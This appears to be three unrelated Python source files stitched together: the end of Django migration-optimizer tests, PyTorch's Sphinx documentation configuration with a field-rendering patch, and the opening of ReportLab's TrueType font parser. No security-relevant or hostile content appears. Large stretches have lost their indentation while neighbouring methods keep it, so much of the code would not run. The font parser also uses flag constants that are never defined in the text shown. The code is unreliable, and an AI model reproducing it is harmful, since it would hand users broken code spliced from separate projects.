self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
("c", models.IntegerField()),
]),
alter,
migrations.RenameField("Foo", "c", "d"),
],
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
("d", models.IntegerField()),
]),
alter,
],
)
# RemoveField
self.assertDoesNotOptimize(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
]),
alter,
migrations.RemoveField("Foo", "b"),
],
)
self.assertOptimizesTo(
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
("c", models.IntegerField()),
]),
alter,
migrations.RemoveField("Foo", "c"),
],
[
migrations.CreateModel("Foo", [
("a", models.IntegerField()),
("b", models.IntegerField()),
]),
alter,
],
)
    def test_create_alter_unique_field(self):
        """Run the shared create/alter/field-op scenarios with
        AlterUniqueTogether as the intervening operation."""
        self._test_create_alter_foo_field(migrations.AlterUniqueTogether("Foo", [["a", "b"]]))
    def test_create_alter_index_field(self):
        """Run the shared create/alter/field-op scenarios with
        AlterIndexTogether as the intervening operation."""
        self._test_create_alter_foo_field(migrations.AlterIndexTogether("Foo", [["a", "b"]]))
    def test_create_alter_owrt_field(self):
        """Run the shared create/alter/field-op scenarios with
        AlterOrderWithRespectTo as the intervening operation."""
        self._test_create_alter_foo_field(migrations.AlterOrderWithRespectTo("Foo", "b"))
    def test_optimize_through_fields(self):
        """
        Check that field-level through-optimization is working. This should
        manage to collapse model Foo to nonexistence, and model Bar to a
        single IntegerField called "width".
        """
        self.assertOptimizesTo(
            [
                migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
                migrations.CreateModel("Bar", [("size", models.IntegerField())]),
                # Foo's operations interleave with Bar's but must not block them.
                migrations.AddField("Foo", "age", models.IntegerField()),
                migrations.AddField("Bar", "width", models.IntegerField()),
                migrations.AlterField("Foo", "age", models.IntegerField()),
                migrations.RenameField("Bar", "size", "dimensions"),
                migrations.RemoveField("Foo", "age"),
                migrations.RenameModel("Foo", "Phou"),
                # Bar's "size"/"dimensions" field is removed, leaving only "width".
                migrations.RemoveField("Bar", "dimensions"),
                migrations.RenameModel("Phou", "Fou"),
                # Foo/Phou/Fou is ultimately deleted, so it should vanish entirely.
                migrations.DeleteModel("Fou"),
            ],
            [
                migrations.CreateModel("Bar", [("width", models.IntegerField())]),
            ],
        )
def test_optimize_elidable_operation(self):
elidable_operation = operations.base.Operation()
elidable_operation.elidable = True
self.assertOptimizesTo(
[
elidable_operation,
migrations.CreateModel("Foo", [("name", models.CharField(max_length=255))]),
elidable_operation,
migrations.CreateModel("Bar", [("size", models.IntegerField())]),
elidable_operation,
migrations.RenameModel("Foo", "Phou"),
migrations.DeleteModel("Bar"),
elidable_operation,
],
[
migrations.CreateModel("Phou", [("name", models.CharField(max_length=255))]),
],
)
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# PyTorch documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 23 13:31:47 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
import torch
try:
import torchvision
except ImportError:
import warnings
warnings.warn('unable to load "torchvision" package')
import sphinx_rtd_theme
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.autosummary',
    'sphinx.ext.doctest',
    'sphinx.ext.intersphinx',
    'sphinx.ext.todo',
    'sphinx.ext.coverage',
    'sphinx.ext.mathjax',
    'sphinx.ext.napoleon',
    'sphinx.ext.viewcode',
]
# Render napoleon "Attributes:" sections as :ivar: fields; the make_field
# patch at the bottom of this file keeps those from becoming broken
# cross-references.
napoleon_use_ivar = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffixes as a list of strings:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'PyTorch'
copyright = '2017, Torch Contributors'
author = 'Torch Contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# TODO: change to [:2] at v1.0
# Strip any "+localsuffix" (e.g. git hash) before taking major.minor.patch.
version = '.'.join(torch.__version__.split('+')[0].split('.')[:3])
# The full version, including alpha/beta/rc tags (local suffix stripped).
# TODO: verify this works as expected
release = torch.__version__.split('+')[0]
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# These patterns also affect html_static_path and html_extra_path.
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
    'collapse_navigation': False,
    'display_version': False,
    'logo_only': True,
}
html_logo = '_static/img/pytorch-logo-dark.svg'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# html_style_path = 'css/pytorch_theme.css'
# Extra stylesheets injected into every page: the Lato webfont plus the
# PyTorch theme overrides shipped in _static/css.
html_context = {
    'css_files': [
        'https://fonts.googleapis.com/css?family=Lato',
        '_static/css/pytorch_theme.css'
    ],
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'PyTorchdoc'
# -- Options for LaTeX output ---------------------------------------------
# All defaults; uncomment an entry below to override it.
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',
    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'pytorch.tex', 'PyTorch Documentation',
     'Torch Contributors', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'PyTorch', 'PyTorch Documentation',
     [author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'PyTorch', 'PyTorch Documentation',
     author, 'PyTorch', 'One line description of project.',
     'Miscellaneous'),
]
# Example configuration for intersphinx: refer to the Python standard library.
# NOTE(review): the numpy inventory URL is plain http — consider https.
intersphinx_mapping = {
    'python': ('https://docs.python.org/', None),
    'numpy': ('http://docs.scipy.org/doc/numpy/', None),
}
# -- A patch that prevents Sphinx from cross-referencing ivar tags -------
# See http://stackoverflow.com/a/41184353/3343043
from docutils import nodes
from sphinx.util.docfields import TypedField
from sphinx import addnodes
def patched_make_field(self, types, domain, items):
    # type: (List, unicode, Tuple) -> nodes.field
    """Replacement for TypedField.make_field that renders each :ivar: name as
    plain bold text instead of a cross-reference link, so Sphinx does not try
    (and fail) to resolve every attribute name as a target.
    """
    def handle_item(fieldarg, content):
        # Build one "name (type) -- description" paragraph for a single field.
        par = nodes.paragraph()
        par += addnodes.literal_strong('', fieldarg)  # Patch: this line added
        # par.extend(self.make_xrefs(self.rolename, domain, fieldarg,
        #                            addnodes.literal_strong))
        if fieldarg in types:
            par += nodes.Text(' (')
            # NOTE: using .pop() here to prevent a single type node to be
            # inserted twice into the doctree, which leads to
            # inconsistencies later when references are resolved
            fieldtype = types.pop(fieldarg)
            if len(fieldtype) == 1 and isinstance(fieldtype[0], nodes.Text):
                typename = u''.join(n.astext() for n in fieldtype)
                # Qualify builtin type names so intersphinx can link them to
                # the Python standard-library documentation.
                typename = typename.replace('int', 'python:int')
                typename = typename.replace('long', 'python:long')
                typename = typename.replace('float', 'python:float')
                typename = typename.replace('type', 'python:type')
                par.extend(self.make_xrefs(self.typerolename, domain, typename,
                                           addnodes.literal_emphasis))
            else:
                par += fieldtype
            par += nodes.Text(')')
        par += nodes.Text(' -- ')
        par += content
        return par
    fieldname = nodes.field_name('', self.label)
    if len(items) == 1 and self.can_collapse:
        # Single field: collapse to one paragraph instead of a bullet list.
        fieldarg, content = items[0]
        bodynode = handle_item(fieldarg, content)
    else:
        bodynode = self.list_type()
        for fieldarg, content in items:
            bodynode += nodes.list_item('', handle_item(fieldarg, content))
    fieldbody = nodes.field_body('', bodynode)
    return nodes.field('', fieldname, fieldbody)
# Install the patch globally for all typed fields (e.g. napoleon ivar output).
TypedField.make_field = patched_make_field
| |
#Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
__version__ = '$Id: ttfonts.py 3959 2012-09-27 14:39:39Z robin $'
__doc__="""TrueType font support
This defines classes to represent TrueType fonts. They know how to calculate
their own width and how to write themselves into PDF files. They support
subsetting and embedding and can represent all 16-bit Unicode characters.
Note on dynamic fonts
---------------------
Usually a Font in ReportLab corresponds to a fixed set of PDF objects (Font,
FontDescriptor, Encoding). But with dynamic font subsetting a single TTFont
will result in a number of Font/FontDescriptor/Encoding object sets, and the
contents of those will depend on the actual characters used for printing.
To support dynamic font subsetting a concept of "dynamic font" was introduced.
Dynamic Fonts have a _dynamicFont attribute set to 1.
Dynamic fonts have the following additional functions::
def splitString(self, text, doc):
'''Splits text into a number of chunks, each of which belongs to a
single subset. Returns a list of tuples (subset, string). Use
subset numbers with getSubsetInternalName. Doc is used to identify
a document so that different documents may have different dynamically
constructed subsets.'''
def getSubsetInternalName(self, subset, doc):
'''Returns the name of a PDF Font object corresponding to a given
subset of this dynamic font. Use this function instead of
PDFDocument.getInternalFontName.'''
You must never call PDFDocument.getInternalFontName for dynamic fonts.
If you have a traditional static font, mapping to PDF text output operators
is simple::
'%s 14 Tf (%s) Tj' % (getInternalFontName(psfontname), text)
If you have a dynamic font, use this instead::
for subset, chunk in font.splitString(text, doc):
'%s 14 Tf (%s) Tj' % (font.getSubsetInternalName(subset, doc), chunk)
(Tf is a font setting operator and Tj is a text output operator. You should
also escape invalid characters in Tj argument, see TextObject._formatText.
Oh, and that 14 up there is font size.)
Canvas and TextObject have special support for dynamic fonts.
"""
import string
from struct import pack, unpack, error as structError
from reportlab.lib.utils import getStringIO
from reportlab.pdfbase import pdfmetrics, pdfdoc
from reportlab import rl_config
class TTFError(pdfdoc.PDFError):
    """Exception raised for TrueType font processing errors."""
def SUBSETN(n,table=string.maketrans('0123456789','ABCDEFGHIJ')):
    "Return the six-letter tag for subset number n (digits mapped 0->A ... 9->J)."
    # The translation table is built once, at definition time, and reused for
    # every call; e.g. n=3 formats as '000003' and translates to 'AAAAAD'.
    return ('%6.6d'%n).translate(table)
#
# Helpers
#
from codecs import utf_8_encode, utf_8_decode, latin_1_decode
# Decode a byte string with the bound codec and return the sequence of
# code points (ordinals) it contains.
parse_utf8=lambda x, decode=utf_8_decode: map(ord,decode(x)[0])
parse_latin1 = lambda x, decode=latin_1_decode: map(ord,decode(x)[0])
def latin1_to_utf8(text):
    "Re-encode a Latin-1 (ISO 8859-1) input string as UTF-8."
    decoded = latin_1_decode(text)[0]
    return utf_8_encode(decoded)[0]
def makeToUnicodeCMap(fontname, subset):
    """Creates a ToUnicode CMap for a given subset. See Adobe
    _PDF_Reference (ISBN 0-201-75839-3) for more information.

    fontname is used for the CMap name and CIDSystemInfo Registry/Ordering;
    subset is a sequence of Unicode code points indexed by their one-byte
    subset code (so at most 256 entries).
    """
    cmap = [
        "/CIDInit /ProcSet findresource begin",
        "12 dict begin",
        "begincmap",
        "/CIDSystemInfo",
        "<< /Registry (%s)" % fontname,
        "/Ordering (%s)" % fontname,
        "/Supplement 0",
        ">> def",
        "/CMapName /%s def" % fontname,
        "/CMapType 2 def",
        "1 begincodespacerange",
        "<00> <%02X>" % (len(subset) - 1),
        "endcodespacerange",
        "%d beginbfchar" % len(subset)
    ] + ["<%02X> <%04X>" % (i,v) for i,v in enumerate(subset)] + [
        "endbfchar",
        "endcmap",
        "CMapName currentdict /CMap defineresource pop",
        "end",
        "end"
    ]
    # Fix: use the str method instead of the Python-2-only string.join();
    # identical output, and works on Python 3 as well.
    return "\n".join(cmap)
def splice(stream, offset, value):
    """Return a copy of stream in which value overwrites the bytes
    starting at offset (the original stream is left unchanged)."""
    end = offset + len(value)
    return stream[:offset] + value + stream[end:]
def _set_ushort(stream, offset, value):
    """Return a copy of stream with value encoded as a big-endian unsigned
    short at the given offset (the original stream is unchanged)."""
    encoded = pack(">H", value)
    return splice(stream, offset, encoded)
# Prefer the C accelerator module when installed; otherwise fall back to the
# pure-Python helper implementations defined below.
try:
    import _rl_accel
except ImportError:
    try:
        from reportlab.lib import _rl_accel
    except ImportError:
        _rl_accel = None
try:
    hex32 = _rl_accel.hex32
except:
    # Fallback: format i as an unsigned 32-bit hex constant, e.g. '0X0000002A'.
    def hex32(i):
        return '0X%8.8X' % (long(i)&0xFFFFFFFFL)
try:
    add32 = _rl_accel.add32L
    calcChecksum = _rl_accel.calcChecksumL
except:
    def add32(x, y):
        "Calculate (x + y) modulo 2**32"
        return (x+y) & 0xFFFFFFFFL
    def calcChecksum(data):
        """Calculates TTF-style checksums"""
        # Pad to a 4-byte boundary, then sum big-endian 32-bit words mod 2**32.
        if len(data)&3: data = data + (4-(len(data)&3))*"\0"
        return sum(unpack(">%dl" % (len(data)>>2), data)) & 0xFFFFFFFFL
del _rl_accel
#
# TrueType font handling
#
# Component flags read from composite-glyph entries in the 'glyf' table
# (used below when walking composite glyphs during subsetting).
GF_ARG_1_AND_2_ARE_WORDS        = 1 << 0
GF_ARGS_ARE_XY_VALUES           = 1 << 1
GF_ROUND_XY_TO_GRID             = 1 << 2
GF_WE_HAVE_A_SCALE              = 1 << 3
GF_RESERVED                     = 1 << 4
GF_MORE_COMPONENTS              = 1 << 5
GF_WE_HAVE_AN_X_AND_Y_SCALE     = 1 << 6
GF_WE_HAVE_A_TWO_BY_TWO         = 1 << 7
GF_WE_HAVE_INSTRUCTIONS         = 1 << 8
GF_USE_MY_METRICS               = 1 << 9
GF_OVERLAP_COMPOUND             = 1 << 10
GF_SCALED_COMPONENT_OFFSET      = 1 << 11
GF_UNSCALED_COMPONENT_OFFSET    = 1 << 12
def TTFOpenFile(fn):
    '''Open a TTF file for binary reading, searching rl_config.TTFSearchPath
    when the plain name cannot be opened directly.
    Returns (filename, file); raises TTFError when nothing can be opened.
    '''
    from reportlab.lib.utils import rl_isfile, open_for_read
    try:
        return fn, open_for_read(fn,'rb')
    except IOError:
        import os
        if not os.path.isabs(fn):
            for directory in rl_config.TTFSearchPath:
                candidate = os.path.join(directory,fn)
                if rl_isfile(candidate):
                    return candidate, open_for_read(candidate,'rb')
        raise TTFError('Can\'t open file "%s"' % fn)
class TTFontParser:
"Basic TTF file parser"
ttfVersions = (0x00010000,0x74727565,0x74746366)
ttcVersions = (0x00010000,0x00020000)
fileKind='TTF'
def __init__(self, file, validate=0,subfontIndex=0):
"""Loads and parses a TrueType font file. file can be a filename or a
file object. If validate is set to a false values, skips checksum
validation. This can save time, especially if the font is large.
"""
self.validate = validate
self.readFile(file)
isCollection = self.readHeader()
if isCollection:
self.readTTCHeader()
self.getSubfont(subfontIndex)
else:
if self.validate: self.checksumFile()
self.readTableDirectory()
self.subfontNameX = ''
def readTTCHeader(self):
self.ttcVersion = self.read_ulong()
self.fileKind = 'TTC'
self.ttfVersions = self.ttfVersions[:-1]
if self.ttcVersion not in self.ttcVersions:
raise TTFError('"%s" is not a %s file: can\'t read version 0x%8.8x' %(self.filename,self.fileKind,self.ttcVersion))
self.numSubfonts = self.read_ulong()
self.subfontOffsets = []
a = self.subfontOffsets.append
for i in xrange(self.numSubfonts):
a(self.read_ulong())
def getSubfont(self,subfontIndex):
if self.fileKind!='TTC':
raise TTFError('"%s" is not a TTC file: use this method' % (self.filename,self.fileKind))
try:
pos = self.subfontOffsets[subfontIndex]
except IndexError:
raise TTFError('TTC file "%s": bad subfontIndex %s not in [0,%d]' % (self.filename,subfontIndex,self.numSubfonts-1))
self.seek(pos)
self.readHeader()
self.readTableDirectory()
self.subfontNameX = '-'+str(subfontIndex)
def readTableDirectory(self):
try:
self.numTables = self.read_ushort()
self.searchRange = self.read_ushort()
self.entrySelector = self.read_ushort()
self.rangeShift = self.read_ushort()
# Read table directory
self.table = {}
self.tables = []
for n in xrange(self.numTables):
record = {}
record['tag'] = self.read_tag()
record['checksum'] = self.read_ulong()
record['offset'] = self.read_ulong()
record['length'] = self.read_ulong()
self.tables.append(record)
self.table[record['tag']] = record
except:
raise TTFError('Corrupt %s file "%s" cannot read Table Directory' % (self.fileKind, self.filename))
if self.validate: self.checksumTables()
def readHeader(self):
'''read the sfnt header at the current position'''
try:
self.version = version = self.read_ulong()
except:
raise TTFError('"%s" is not a %s file: can\'t read version' %(self.filename,self.fileKind))
if version==0x4F54544F:
raise TTFError('%s file "%s": postscript outlines are not supported'%(self.fileKind,self.filename))
if version not in self.ttfVersions:
raise TTFError('Not a TrueType font: version=0x%8.8X' % version)
return version==self.ttfVersions[-1]
def readFile(self,f):
if hasattr(f,'read'):
self.filename = '(ttf)'
else:
self.filename, f = TTFOpenFile(f)
self._ttf_data = f.read()
self._pos = 0
def checksumTables(self):
# Check the checksums for all tables
for t in self.tables:
table = self.get_chunk(t['offset'], t['length'])
checksum = calcChecksum(table)
if t['tag'] == 'head':
adjustment = unpack('>l', table[8:8+4])[0]
checksum = add32(checksum, -adjustment)
xchecksum = t['checksum']
if xchecksum != checksum:
raise TTFError('TTF file "%s": invalid checksum %s table: %s (expected %s)' % (self.filename,hex32(checksum),t['tag'],hex32(xchecksum)))
def checksumFile(self):
# Check the checksums for the whole file
checksum = calcChecksum(self._ttf_data)
if 0xB1B0AFBAL!=checksum:
raise TTFError('TTF file "%s": invalid checksum %s (expected 0xB1B0AFBA) len: %d &3: %d' % (self.filename,hex32(checksum),len(self._ttf_data),(len(self._ttf_data)&3)))
def get_table_pos(self, tag):
"Returns the offset and size of a given TTF table."
offset = self.table[tag]['offset']
length = self.table[tag]['length']
return (offset, length)
def seek(self, pos):
"Moves read pointer to a given offset in file."
self._pos = pos
def skip(self, delta):
"Skip the given number of bytes."
self._pos = self._pos + delta
def seek_table(self, tag, offset_in_table = 0):
"""Moves read pointer to the given offset within a given table and
returns absolute offset of that position in the file."""
self._pos = self.get_table_pos(tag)[0] + offset_in_table
return self._pos
def read_tag(self):
"Read a 4-character tag"
self._pos += 4
return self._ttf_data[self._pos - 4:self._pos]
def read_ushort(self):
"Reads an unsigned short"
self._pos += 2
return unpack('>H',self._ttf_data[self._pos-2:self._pos])[0]
def read_ulong(self):
"Reads an unsigned long"
self._pos += 4
return unpack('>L',self._ttf_data[self._pos - 4:self._pos])[0]
def read_short(self):
"Reads a signed short"
self._pos += 2
try:
return unpack('>h',self._ttf_data[self._pos-2:self._pos])[0]
except structError, error:
raise TTFError, error
def get_ushort(self, pos):
"Return an unsigned short at given position"
return unpack('>H',self._ttf_data[pos:pos+2])[0]
def get_ulong(self, pos):
"Return an unsigned long at given position"
return unpack('>L',self._ttf_data[pos:pos+4])[0]
def get_chunk(self, pos, length):
"Return a chunk of raw data at given position"
return self._ttf_data[pos:pos+length]
def get_table(self, tag):
"Return the given TTF table"
pos, length = self.get_table_pos(tag)
return self._ttf_data[pos:pos+length]
class TTFontMaker:
    "Basic TTF file generator"
    def __init__(self):
        "Initializes the generator."
        self.tables = {}
    def add(self, tag, data):
        "Adds a table to the TTF file."
        if tag == 'head':
            # Zero head's checkSumAdjustment (offset 8); it is recomputed
            # and patched in at the end of makeStream().
            data = splice(data, 8, '\0\0\0\0')
        self.tables[tag] = data
    def makeStream(self):
        "Finishes the generation and returns the TTF file as a string"
        stm = getStringIO()
        write = stm.write
        numTables = len(self.tables)
        # searchRange/entrySelector/rangeShift are the binary-search helper
        # fields required by the sfnt table-directory header.
        searchRange = 1
        entrySelector = 0
        while searchRange * 2 <= numTables:
            searchRange = searchRange * 2
            entrySelector = entrySelector + 1
        searchRange = searchRange * 16
        rangeShift = numTables * 16 - searchRange
        # Header
        write(pack(">lHHHH", 0x00010000, numTables, searchRange,
                   entrySelector, rangeShift))
        # Table directory
        tables = self.tables.items()
        tables.sort()     # XXX is this the correct order?
        offset = 12 + numTables * 16
        for tag, data in tables:
            if tag == 'head':
                # Remember where head will land so its checkSumAdjustment
                # can be patched after the whole stream is written.
                head_start = offset
            checksum = calcChecksum(data)
            write(tag)
            write(pack(">LLL", checksum, offset, len(data)))
            # Each table is padded to a 4-byte boundary.
            paddedLength = (len(data)+3)&~3
            offset = offset + paddedLength
        # Table data
        for tag, data in tables:
            data += "\0\0\0"
            write(data[:len(data)&~3])
        # Patch head.checkSumAdjustment so the whole file sums to 0xB1B0AFBA.
        checksum = calcChecksum(stm.getvalue())
        checksum = add32(0xB1B0AFBAL, -checksum)
        stm.seek(head_start + 8)
        write(pack('>L', checksum))
        return stm.getvalue()
class TTFontFile(TTFontParser):
"TTF file parser and generator"
    def __init__(self, file, charInfo=1, validate=0,subfontIndex=0):
        """Loads and parses a TrueType font file.
        file can be a filename or a file object. If validate is set to a false
        value, checksum validation is skipped. This can save time, especially
        if the font is large. See TTFontFile.extractInfo for more information.
        """
        TTFontParser.__init__(self, file, validate=validate,subfontIndex=subfontIndex)
        # Populate name/metric/cmap attributes (see extractInfo docstring).
        self.extractInfo(charInfo)
    def extractInfo(self, charInfo=1):
        """
        Extract typographic information from the loaded font file.

        The following attributes will be set::

            name         PostScript font name
            flags        Font flags
            ascent       Typographic ascender in 1/1000ths of a point
            descent      Typographic descender in 1/1000ths of a point
            capHeight    Cap height in 1/1000ths of a point (0 if not available)
            bbox         Glyph bounding box [l,t,r,b] in 1/1000ths of a point
            _bbox        Glyph bounding box [l,t,r,b] in unitsPerEm
            unitsPerEm   Glyph units per em
            italicAngle  Italic angle in degrees ccw
            stemV        stem weight in 1/1000ths of a point (approximate)

        If charInfo is true, the following will also be set::

            defaultWidth   default glyph width in 1/1000ths of a point
            charWidths     dictionary of character widths for every supported
                           UCS character code

        This will only work if the font has a Unicode cmap (platform 3,
        encoding 1, format 4 or platform 0 any encoding format 4). Setting
        charInfo to false avoids this requirement.
        """
        # name - Naming table
        name_offset = self.seek_table("name")
        format = self.read_ushort()
        if format != 0:
            raise TTFError, "Unknown name table format (%d)" % format
        numRecords = self.read_ushort()
        string_data_offset = name_offset + self.read_ushort()
        # nameIDs of interest: 1=family, 2=subfamily/style, 3=unique ID,
        # 4=full name, 6=PostScript name.
        names = {1:None,2:None,3:None,4:None,6:None}
        K = names.keys()
        nameCount = len(names)
        for i in xrange(numRecords):
            platformId = self.read_ushort()
            encodingId = self.read_ushort()
            languageId = self.read_ushort()
            nameId = self.read_ushort()
            length = self.read_ushort()
            offset = self.read_ushort()
            if nameId not in K: continue
            N = None
            if platformId == 3 and encodingId == 1 and languageId == 0x409: # Microsoft, Unicode, US English, PS Name
                opos = self._pos
                try:
                    self.seek(string_data_offset + offset)
                    if length % 2 != 0:
                        raise TTFError, "PostScript name is UTF-16BE string of odd length"
                    # Length in bytes -> number of 16-bit units.
                    length /= 2
                    N = []
                    A = N.append
                    while length > 0:
                        char = self.read_ushort()
                        A(chr(char))
                        length -= 1
                    N = ''.join(N)
                finally:
                    # Always restore the read pointer for the record loop.
                    self._pos = opos
            elif platformId == 1 and encodingId == 0 and languageId == 0: # Macintosh, Roman, English, PS Name
                # According to OpenType spec, if PS name exists, it must exist
                # both in MS Unicode and Macintosh Roman formats. Apparently,
                # you can find live TTF fonts which only have Macintosh format.
                N = self.get_chunk(string_data_offset + offset, length)
            if N and names[nameId]==None:
                names[nameId] = N
                nameCount -= 1
                if nameCount==0: break
        if names[6] is not None:
            psName = names[6].replace(" ", "-") #Dinu Gherman's fix for font names with spaces
        elif names[4] is not None:
            psName = names[4].replace(" ", "-")
        # Fine, one last try before we bail.
        elif names[1] is not None:
            psName = names[1].replace(" ", "-")
        else:
            psName = None
        # Don't just assume, check for None since some shoddy fonts cause crashes here...
        if not psName:
            raise TTFError, "Could not find PostScript font name"
        for c in psName:
            oc = ord(c)
            if oc>126 or c in ' [](){}<>/%':
                raise TTFError, "psName=%r contains invalid character '%s' ie U+%04X" % (psName,c,ord(c))
        self.name = psName
        self.familyName = names[1] or psName
        self.styleName = names[2] or 'Regular'
        self.fullName = names[4] or psName
        self.uniqueFontID = names[3] or psName
        # head - Font header table
        self.seek_table("head")
        ver_maj, ver_min = self.read_ushort(), self.read_ushort()
        if ver_maj != 1:
            raise TTFError, 'Unknown head table version %d.%04x' % (ver_maj, ver_min)
        self.fontRevision = self.read_ushort(), self.read_ushort()
        self.skip(4)
        magic = self.read_ulong()
        if magic != 0x5F0F3CF5:
            raise TTFError, 'Invalid head table magic %04x' % magic
        self.skip(2)
        self.unitsPerEm = unitsPerEm = self.read_ushort()
        # Convert font units to 1/1000ths of a point (PDF glyph space).
        scale = lambda x, unitsPerEm=unitsPerEm: x * 1000. / unitsPerEm
        self.skip(16)
        xMin = self.read_short()
        yMin = self.read_short()
        xMax = self.read_short()
        yMax = self.read_short()
        self.bbox = map(scale, [xMin, yMin, xMax, yMax])
        self.skip(3*2)
        indexToLocFormat = self.read_ushort()
        glyphDataFormat = self.read_ushort()
        # OS/2 - OS/2 and Windows metrics table
        # (needs data from head table)
        if "OS/2" in self.table:
            self.seek_table("OS/2")
            version = self.read_ushort()
            self.skip(2)
            usWeightClass = self.read_ushort()
            self.skip(2)
            fsType = self.read_ushort()
            # Respect the font's embedding restrictions.
            if fsType == 0x0002 or (fsType & 0x0300) != 0:
                raise TTFError, 'Font does not allow subsetting/embedding (%04X)' % fsType
            self.skip(58) #11*2 + 10 + 4*4 + 4 + 3*2
            sTypoAscender = self.read_short()
            sTypoDescender = self.read_short()
            self.ascent = scale(sTypoAscender) # XXX: for some reason it needs to be multiplied by 1.24--1.28
            self.descent = scale(sTypoDescender)
            if version > 1:
                self.skip(16) #3*2 + 2*4 + 2
                sCapHeight = self.read_short()
                self.capHeight = scale(sCapHeight)
            else:
                self.capHeight = self.ascent
        else:
            # Microsoft TTFs require an OS/2 table; Apple ones do not. Try to
            # cope. The data is not very important anyway.
            usWeightClass = 500
            self.ascent = scale(yMax)
            self.descent = scale(yMin)
            self.capHeight = self.ascent
        # There's no way to get stemV from a TTF file short of analyzing actual outline data
        # This fuzzy formula is taken from pdflib sources, but we could just use 0 here
        self.stemV = 50 + int((usWeightClass / 65.0) ** 2)
        # post - PostScript table
        # (needs data from OS/2 table)
        self.seek_table("post")
        ver_maj, ver_min = self.read_ushort(), self.read_ushort()
        if ver_maj not in (1, 2, 3, 4):
            # Adobe/MS documents 1, 2, 2.5, 3; Apple also has 4.
            # From Apple docs it seems that we do not need to care
            # about the exact version, so if you get this error, you can
            # try to remove this check altogether.
            raise TTFError, 'Unknown post table version %d.%04x' % (ver_maj, ver_min)
        # italicAngle is a 16.16 fixed-point value.
        self.italicAngle = self.read_short() + self.read_ushort() / 65536.0
        self.underlinePosition = self.read_short()
        self.underlineThickness = self.read_short()
        isFixedPitch = self.read_ulong()
        self.flags = FF_SYMBOLIC # All fonts that contain characters
                                 # outside the original Adobe character
                                 # set are considered "symbolic".
        if self.italicAngle!= 0:
            self.flags = self.flags | FF_ITALIC
        if usWeightClass >= 600: # FW_REGULAR == 500, FW_SEMIBOLD == 600
            self.flags = self.flags | FF_FORCEBOLD
        if isFixedPitch:
            self.flags = self.flags | FF_FIXED
        # XXX: FF_SERIF? FF_SCRIPT? FF_ALLCAP? FF_SMALLCAP?
        # hhea - Horizontal header table
        self.seek_table("hhea")
        ver_maj, ver_min = self.read_ushort(), self.read_ushort()
        if ver_maj != 1:
            raise TTFError, 'Unknown hhea table version %d.%04x' % (ver_maj, ver_min)
        self.skip(28)
        metricDataFormat = self.read_ushort()
        if metricDataFormat != 0:
            raise TTFError, 'Unknown horizontal metric data format (%d)' % metricDataFormat
        numberOfHMetrics = self.read_ushort()
        if numberOfHMetrics == 0:
            raise TTFError, 'Number of horizontal metrics is 0'
        # maxp - Maximum profile table
        self.seek_table("maxp")
        ver_maj, ver_min = self.read_ushort(), self.read_ushort()
        if ver_maj != 1:
            raise TTFError, 'Unknown maxp table version %d.%04x' % (ver_maj, ver_min)
        numGlyphs = self.read_ushort()
        if not charInfo:
            # Caller asked only for the typographic info extracted above.
            self.charToGlyph = None
            self.defaultWidth = None
            self.charWidths = None
            return
        if glyphDataFormat != 0:
            raise TTFError, 'Unknown glyph data format (%d)' % glyphDataFormat
        # cmap - Character to glyph index mapping table
        cmap_offset = self.seek_table("cmap")
        self.skip(2)
        cmapTableCount = self.read_ushort()
        unicode_cmap_offset = None
